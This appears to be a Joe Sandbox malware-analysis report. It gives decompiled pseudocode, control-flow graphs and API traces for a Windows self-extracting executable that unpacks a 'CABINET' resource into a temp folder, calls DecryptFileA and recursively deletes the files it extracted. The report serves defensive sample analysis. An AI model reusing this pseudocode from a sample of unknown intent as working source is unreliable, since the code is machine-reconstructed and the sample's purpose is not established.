                                                                        • API String ID: 4237285672-0
                                                                        • Opcode ID: e2ee3eb39f2fbdcc7b0a4189f659b78f8672f694c8b4962c7e1b806523345f9d
                                                                        • Instruction ID: 70f950e2302bd2d4cb0075a7ce29ffecc9f7a4d8472765814e6de431ad39ddb9
                                                                        • Opcode Fuzzy Hash: e2ee3eb39f2fbdcc7b0a4189f659b78f8672f694c8b4962c7e1b806523345f9d
                                                                        • Instruction Fuzzy Hash: 147190B290161CAFEB179F64ED85FFA77BCEB48340F0440ABF44596240EA309E848B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 374 3d4fe0-3d501a call 3d468f FindResourceA LoadResource LockResource 377 3d5161-3d5163 374->377 378 3d5020-3d5027 374->378 379 3d5029-3d5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->379 380 3d5057-3d505e call 3d4efd 378->380 379->380 383 3d507c-3d50b4 380->383 384 3d5060-3d5077 call 3d44b9 380->384 389 3d50e8-3d5104 call 3d44b9 383->389 390 3d50b6-3d50da 383->390 388 3d5107-3d510e 384->388 392 3d511d-3d511f 388->392 393 3d5110-3d5117 FreeResource 388->393 398 3d5106 389->398 390->398 402 3d50dc 390->402 395 3d513a-3d5141 392->395 396 3d5121-3d5127 392->396 393->392 400 3d515f 395->400 401 3d5143-3d514a 395->401 396->395 399 3d5129-3d5135 call 3d44b9 396->399 398->388 399->395 400->377 401->400 404 3d514c-3d5159 SendMessageA 401->404 405 3d50e3-3d50e6 402->405 404->400 405->389 405->398
                                                                        C-Code - Quality: 77%
                                                                        			E003D4FE0(void* __edi, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* _t8;
                                                                        				struct HWND__* _t9;
                                                                        				int _t10;
                                                                        				void* _t12;
                                                                        				struct HWND__* _t24;
                                                                        				struct HWND__* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t33;
                                                                        				int _t34;
                                                                        				CHAR* _t36;
                                                                        				int _t37;
                                                                        				intOrPtr _t47;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t36 = "CABINET";
                                                                        				 *0x3d9144 = E003D468F(_t36, 0, 0);
                                                                        				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                        				 *0x3d9140 = _t8;
                                                                        				if(_t8 == 0) {
                                                                        					return _t8;
                                                                        				}
                                                                        				_t9 =  *0x3d8584; // 0x0
                                                                        				if(_t9 != 0) {
                                                                        					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                        					ShowWindow(GetDlgItem( *0x3d8584, 0x841), 5);
                                                                        				}
                                                                        				_t10 = E003D4EFD(0, 0);
                                                                        				if(_t10 != 0) {
                                                                        					__imp__#20(E003D4CA0, E003D4CC0, E003D4980, E003D4A50, E003D4AD0, E003D4B60, E003D4BC0, 1, 0x3d9148, _t33);
                                                                        					_t34 = _t10;
                                                                        					if(_t34 == 0) {
                                                                        						L8:
                                                                        						_t29 =  *0x3d9148; // 0x0
                                                                        						_t24 =  *0x3d8584; // 0x0
                                                                        						E003D44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                        						_t37 = 0;
                                                                        						L9:
                                                                        						goto L10;
                                                                        					}
                                                                        					__imp__#22(_t34, "*MEMCAB", 0x3d1140, 0, E003D4CD0, 0, 0x3d9140); // executed
                                                                        					_t37 = _t10;
                                                                        					if(_t37 == 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					__imp__#23(_t34); // executed
                                                                        					if(_t10 != 0) {
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					_t27 =  *0x3d8584; // 0x0
                                                                        					E003D44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                        					_t37 = 0;
                                                                        					L10:
                                                                        					_t12 =  *0x3d9140; // 0x0
                                                                        					if(_t12 != 0) {
                                                                        						FreeResource(_t12);
                                                                        						 *0x3d9140 = 0;
                                                                        					}
                                                                        					if(_t37 == 0) {
                                                                        						_t47 =  *0x3d91d8; // 0x0
                                                                        						if(_t47 == 0) {
                                                                        							E003D44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                        						}
                                                                        					}
                                                                        					if(( *0x3d8a38 & 0x00000001) == 0 && ( *0x3d9a34 & 0x00000001) == 0) {
                                                                        						SendMessageA( *0x3d8584, 0xfa1, _t37, 0);
                                                                        					}
                                                                        					return _t37;
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 003D4FFE
                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 003D5006
                                                                        • LockResource.KERNEL32(00000000), ref: 003D500D
                                                                        • GetDlgItem.USER32(00000000,00000842), ref: 003D5030
                                                                        • ShowWindow.USER32(00000000), ref: 003D5037
                                                                        • GetDlgItem.USER32(00000841,00000005), ref: 003D504A
                                                                        • ShowWindow.USER32(00000000), ref: 003D5051
                                                                        • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 003D5111
                                                                        • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 003D5159
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                        • String ID: *MEMCAB$CABINET
                                                                        • API String ID: 1305606123-2642027498
                                                                        • Opcode ID: 589046182439d1548d783592bda2ed50a4b139a6e50eeb54473ae403e664cad0
                                                                        • Instruction ID: d2cba7f7dbfe31ca3088c51dd21f5216d515841de65e03c0c6da2e902e2ca1ff
                                                                        • Opcode Fuzzy Hash: 589046182439d1548d783592bda2ed50a4b139a6e50eeb54473ae403e664cad0
                                                                        • Instruction Fuzzy Hash: 5F3108B3642702BBEB235B72FD8AF6737ACA708745F050417F901A6391DAB49C408660
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 406 3d2f1d-3d2f3d 407 3d2f6c-3d2f73 call 3d5164 406->407 408 3d2f3f-3d2f46 406->408 417 3d2f79-3d2f80 call 3d55a0 407->417 418 3d3041 407->418 409 3d2f5f-3d2f66 call 3d3a3f 408->409 410 3d2f48 call 3d51e5 408->410 409->407 409->418 415 3d2f4d-3d2f4f 410->415 415->418 420 3d2f55-3d2f5d 415->420 417->418 424 3d2f86-3d2fbe GetSystemDirectoryA call 3d658a LoadLibraryA 417->424 419 3d3043-3d3053 call 3d6ce0 418->419 420->407 420->409 428 3d2ff7-3d3004 FreeLibrary 424->428 429 3d2fc0-3d2fd4 GetProcAddress 424->429 431 3d3017-3d3024 SetCurrentDirectoryA 428->431 432 3d3006-3d300c 428->432 429->428 430 3d2fd6-3d2fee DecryptFileA 429->430 430->428 442 3d2ff0-3d2ff5 430->442 434 3d3054-3d305a 431->434 435 3d3026-3d303c call 3d44b9 call 3d6285 431->435 432->431 433 3d300e call 3d621e 432->433 446 3d3013-3d3015 433->446 438 3d305c call 3d3b26 434->438 439 3d3065-3d306c 434->439 435->418 450 3d3061-3d3063 438->450 444 3d307c-3d3089 439->444 445 3d306e-3d3075 call 3d256d 439->445 442->428 447 3d308b-3d3091 444->447 448 3d30a1-3d30a9 444->448 456 3d307a 445->456 446->418 446->431 447->448 452 3d3093 call 3d3ba2 447->452 454 3d30ab-3d30ad 448->454 455 3d30b4-3d30b7 448->455 450->418 450->439 459 3d3098-3d309a 452->459 454->455 458 3d30af call 3d4169 454->458 455->419 456->444 458->455 459->418 461 3d309c 459->461 461->448
                                                                        C-Code - Quality: 82%
                                                                        			E003D2F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0x3d8a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E003D5164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E003D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E003D55A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E003D658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0x3da288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0x3d8a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0x3d8a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0x3d8d48 & 0x000000c0;
                                                                        									if(( *0x3d8d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0x3d9a40; // 0x3, executed
                                                                        										_t26 = E003D256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0x3d8a24; // 0x0
                                                                        									 *0x3d9a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0x3d8a38;
                                                                        										if( *0x3d8a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E003D4169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0x3d9a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E003D3BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0x3d8a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E003D3B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E003D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0x3d9124 = E003D6285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0x3d9a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E003D621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0x3d8a24;
                                                                        				if( *0x3d8a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E003D3A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E003D51E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0x3d8a38;
                                                                        				if( *0x3d8a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}





























                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D2F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 003D2FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 003D2FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 003D2FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003D2FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D301C
                                                                          • Part of subcall function 003D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003D2F4D,?,00000002,00000000), ref: 003D5201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-3095882572
                                                                        • Opcode ID: 154b302145a4fb300af673b1007288d605d4811d9304e1c4425f3910ead0fcaa
                                                                        • Instruction ID: 8370b2098c0628199cbf0ed3f6f95994e6bd29e74ae05128db6850668bc13ac6
                                                                        • Opcode Fuzzy Hash: 154b302145a4fb300af673b1007288d605d4811d9304e1c4425f3910ead0fcaa
                                                                        • Instruction Fuzzy Hash: 9141F533A022159BDB33AB71BD46B6A33ADEB54751F010427E942C6391EF74CF84CA62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 478 3d5467-3d5484 479 3d551c-3d5528 call 3d1680 478->479 480 3d548a-3d5490 call 3d53a1 478->480 484 3d552d-3d5539 call 3d58c8 479->484 483 3d5495-3d5497 480->483 485 3d549d-3d54c0 call 3d1781 483->485 486 3d5581-3d5583 483->486 493 3d554d-3d5552 484->493 494 3d553b-3d5545 CreateDirectoryA 484->494 495 3d550c-3d551a call 3d658a 485->495 496 3d54c2-3d54d8 GetSystemInfo 485->496 489 3d558d-3d559d call 3d6ce0 486->489 500 3d5585-3d558b 493->500 501 3d5554-3d5557 call 3d597d 493->501 498 3d5577-3d557c call 3d6285 494->498 499 3d5547 494->499 495->484 502 3d54fe 496->502 503 3d54da-3d54dd 496->503 498->486 499->493 500->489 511 3d555c-3d555e 501->511 512 3d5503-3d5507 call 3d658a 502->512 509 3d54df-3d54e2 503->509 510 3d54f7-3d54fc 503->510 513 3d54e4-3d54e7 509->513 514 3d54f0-3d54f5 509->514 510->512 511->500 515 3d5560-3d5566 511->515 512->495 513->495 517 3d54e9-3d54ee 513->517 514->512 515->486 518 3d5568-3d5575 RemoveDirectoryA 515->518 517->512 518->486
                                                                        C-Code - Quality: 75%
                                                                        			E003D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _SYSTEM_INFO _v304;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t10;
                                                                        				void* _t13;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				signed int _t26;
                                                                        				void* _t28;
                                                                        				void* _t29;
                                                                        				CHAR* _t48;
                                                                        				signed int _t49;
                                                                        				intOrPtr _t61;
                                                                        
                                                                        				_t10 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t10 ^ _t49;
                                                                        				_push(__ecx);
                                                                        				if(__edx == 0) {
                                                                        					_t48 = 0x3d91e4;
                                                                        					_t42 = 0x104;
                                                                        					E003D1680(0x3d91e4, 0x104);
                                                                        					L14:
                                                                        					_t13 = E003D58C8(_t48); // executed
                                                                        					if(_t13 != 0) {
                                                                        						L17:
                                                                        						_t42 = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L23:
                                                                        							 *0x3d9124 = 0;
                                                                        							_t14 = 1;
                                                                        							L24:
                                                                        							return E003D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                        						}
                                                                        						_t16 = E003D597D(_t48, _t42, 1, 0); // executed
                                                                        						if(_t16 != 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t61 =  *0x3d8a20; // 0x0
                                                                        						if(_t61 != 0) {
                                                                        							 *0x3d8a20 = 0;
                                                                        							RemoveDirectoryA(_t48);
                                                                        						}
                                                                        						L22:
                                                                        						_t14 = 0;
                                                                        						goto L24;
                                                                        					}
                                                                        					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                        						 *0x3d9124 = E003D6285();
                                                                        						goto L22;
                                                                        					}
                                                                        					 *0x3d8a20 = 1;
                                                                        					goto L17;
                                                                        				}
                                                                        				_t42 =  &_v268;
                                                                        				_t20 = E003D53A1(__ecx,  &_v268); // executed
                                                                        				if(_t20 == 0) {
                                                                        					goto L22;
                                                                        				}
                                                                        				_push(__ecx);
                                                                        				_t48 = 0x3d91e4;
                                                                        				E003D1781(0x3d91e4, 0x104, __ecx,  &_v268);
                                                                        				if(( *0x3d9a34 & 0x00000020) == 0) {
                                                                        					L12:
                                                                        					_t42 = 0x104;
                                                                        					E003D658A(_t48, 0x104, 0x3d1140);
                                                                        					goto L14;
                                                                        				}
                                                                        				GetSystemInfo( &_v304);
                                                                        				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                        				if(_t26 == 0) {
                                                                        					_push("i386");
                                                                        					L11:
                                                                        					E003D658A(_t48, 0x104);
                                                                        					goto L12;
                                                                        				}
                                                                        				_t28 = _t26 - 1;
                                                                        				if(_t28 == 0) {
                                                                        					_push("mips");
                                                                        					goto L11;
                                                                        				}
                                                                        				_t29 = _t28 - 1;
                                                                        				if(_t29 == 0) {
                                                                        					_push("alpha");
                                                                        					goto L11;
                                                                        				}
                                                                        				if(_t29 != 1) {
                                                                        					goto L12;
                                                                        				}
                                                                        				_push("ppc");
                                                                        				goto L11;
                                                                        			}





















                                                                        APIs
                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D54C9
                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D553D
                                                                        • RemoveDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D556F
                                                                          • Part of subcall function 003D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D53FB
                                                                          • Part of subcall function 003D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5402
                                                                          • Part of subcall function 003D53A1: GetTempFileNameA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D541F
                                                                          • Part of subcall function 003D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D542B
                                                                          • Part of subcall function 003D53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5434
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%


                                                                        C-Code - Quality: 86%
                                                                        			E003D2390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E003D6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E003D1680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E003D16B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E003D1680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E003D16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E003D16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E003D658A( &_v280, 0x104, 0x3d1140);
                                                                        								E003D2390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,003D8A3A,003D11F4,003D8A3A,00000000,?,?), ref: 003D23F6
                                                                        • lstrcmpA.KERNEL32(?,003D11F8), ref: 003D2427
                                                                        • lstrcmpA.KERNEL32(?,003D11FC), ref: 003D243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 003D2495
                                                                        • DeleteFileA.KERNEL32(?), ref: 003D24A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 003D24AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 003D24BE
                                                                        • RemoveDirectoryA.KERNELBASE(003D8A3A), ref: 003D24C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E003D2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0x3da288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0x3d9124 = 0;
                                                                        				if(E003D2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E003D2F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E003D52B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0x3d8a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0x3d9a2c; // 0x0
